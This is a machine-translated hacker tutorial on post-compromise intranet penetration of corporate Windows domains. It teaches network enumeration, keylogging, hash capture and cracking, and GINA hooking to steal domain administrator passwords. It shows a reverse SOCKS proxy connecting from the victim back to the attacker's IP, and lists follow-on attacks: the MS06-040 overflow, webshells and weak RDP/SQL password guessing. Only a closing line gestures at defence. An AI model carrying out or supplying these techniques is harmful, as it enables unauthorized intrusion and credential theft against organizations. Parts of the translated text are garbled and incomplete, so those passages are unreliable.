Author: chenling rose
Intranet, many people should have formed this concept. Many external websites or servers on large networks are not necessarily useful. Of course, Internet is also a breakthrough. Most of the time, we start with the Internet. As security continues to reinforce, it has become increasingly difficult. So how do hackers usually perform Intranet penetration and how does Intranet penetration connect with social engineering? Today, we mainly describe the common Operator Method of hacker Intranet penetration and how to obtain Intranet machines, please refer to my previous article Intranet penetration-how to open a breakthrough.
Penetration is a process of information spying, exploitation, thinking, and breakthrough. First, what should we do after we get an intranet machine? Of course, it is information spying.
I. Information spying
1. What is the identity of the former machine character, namely, the customer service, sales personnel, developers, and administrators. What will the customer service do, how will it contact others, what developers are developing, should they contact the administrator, and have certain Internet management permissions and Intranet test servers, in this case, you can test the server over the Intranet. If it is a customer service machine or a salesperson machine, he must have the contact information of the entire company or network, and make full use of his imagination. This is an administrator machine.
2. The analysis of the current network structure is a domain structure or a vlan-based structure. Most large networks use a domain structure. Generally, servers on the Internet have hardware firewalls, and some machines on the Intranet can only be connected to mac. So let's first look at the Intranet:
C: \ WINNT \ system32> net view
Server Name Description
-------------------------------------------------------------------------------
NAS 4 Bay SATA
NAS 4 Bay SATA
Akira-wu
...
First use net view to check the Intranet. The listed machines are connected in the network structure, but not all are in the same network segment. Therefore, ping the ip addresses of these machines, to analyze which network segments are available.
3. Understand the role of the local machine in the Network
Ipconfig/all first to check whether it is in the domain,
From the perspective of, we can know that there is a domain xxxx. From the perspective of the Intranet ip address, there should still be many segments, with a large intranet. Ping the domain xxxx to obtain the ip address of the Domain Server.
Let's take a look at the role of the local machine in the domain ,:
It seems to be just a common domain user. Let's take a look at the users in the domain.
...
There are many users in the domain, so let's look at what the domain administrator has:
We have obtained the rough information about the Intranet. We will further exploit this information.
II. Information Utilization:
1. First, the machine occupied by the Intranet should take several necessary measures: 1) record the key and record the possible logon password, which is useful. 2) capture the hash run password and check whether the password rules are regular. You can also try the passwords of other machines to see if they are common. 3) gina. This step is not to record the password of the current user, but to record the login password of the domain administrator, because the domain administrator has the permission to log on to the machine of each user below, gina can be remembered. After the domain management password is recorded, all machines in the domain can be controlled over the Intranet. 4) attach a backup installation file or a backup drive to the standby server to prevent the other server from being reinstalled.
2. Rebound socks proxy.
In Intranet penetration, it is necessary to rebound the socks proxy. We all know that lcx is used to forward the port. It seems that few people directly rebound the proxy to connect. Because we want to connect to its machine on the Intranet, it is impossible for us to connect to the transit port one by one. There is no way to enable proxy on the machine currently controlled, because the other party is on the Intranet. So we use the bounce proxy method. This method is actually clear to everyone.
First, listen on the local machine:
C: \> hd-s-listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port: 53 ......
This command is used to connect the packet from port 53 to port 1180.
Run the following command on the target machine:
C: \ RECYCLER> hd-s-connect x. x 53
[+] MainSocket Connect to x. x: 53 Success!
[+] Send Main Command OK!
[+] Recv Main Command OK!
[+] Send Main Command again OK!
The above x. x is your Internet ip address, and the following shows the situation that you receive the bounce back proxy.
C: \> hd-s-listen 53 1180
[+] Listening ConnectBack Port 53 ......
[+] Listen OK!
[+] Listening Socks5 Agent Port 1180 ......
[+] Listen2 OK!
[+] Waiting for MainSocket on port: 53 ......
[+] Recv Main Command Echo OK!
[+] Send Main Command Echo OK!
[+] Recv Main Command Echo again OK!
[+] Get a MainSocket on port 53 from x. x ......
[+] Waiting Client on Socks5 Agent Port: 1180 ....
The above is OK. Next, install sockscap on your local machine and set it as OK.
Sockscap is set in the "file"-"Settings" on the console. The console can put the program you want to proxy on and drag it in directly, the console machine program can be connected to the machine connected to the Intranet. For example, if you directly use mstsc to connect to 3389 of other machines in the Intranet, you can try the password or log on to the management, or use mssql to connect to 1433 of the Intranet and try a weak sa password. In short, socks bounce is a bridge between the Intranet machines you have controlled and other machines on the Intranet.
Iii. Thinking:
The information is available and the channel is available. What should we do next?
1. Intranet overflow. By scanning the Intranet, you can determine the win2000 machine and use ms06040 to carry out the course overflow.
2. Intranet web, through Intranet scanning, use ie on sockscap to open the Intranet open web, and use web injection or upload on the Intranet to obtain webshell Elevation of Privilege.
3. Try to guess the password of the Intranet nt using ipc, or 3389, as well as the password information. Of course, this requires patience and is also very useful.
4. Guess the weak SQL password. On the sockscap console, use the SQL connector to connect to the Intranet and open 1433 or 3306 machines.
5. Intranet sniffing is not recommended.
6. Active session hijacking in the Intranet, which is long and difficult. Details will be provided next time.
4. Breakthrough:
Breakthrough is a time to test experience and thinking, and use the information that has been mastered to break through the difficulties. For example, how to get the first Intranet server to gain a foothold, how to get the Intranet to the Internet authorized machine, and how to get the internet password.
After the internal network stands firm, it is extremely important to quickly determine the Administrator machine. Generally, we can see the Administrator machine from the machine name. The Administrator's machine names are often andy, admin, peter, and kater. In the domain control environment, we can directly use ipc to connect to the Administrator machine as long as we get the domain control password. In a non-domain control environment, we can also test the server's password on the Intranet and try the Administrator's password.
In the course of breakthrough, the analysis of Intranet databases and web is very important. There is a lot of useful information in the database, and the connection and function of web databases will also help further analysis. In short, in this process, only flexible use and divergent thinking can further break through and control.
Hackers and security are a conflict. Only by knowing what you know can you better maintain intranet security. The above are the common intranet penetration techniques used by hackers, with limited knowledge, rough text, and a strong smile. This article is only for beginners.
By rose of ncph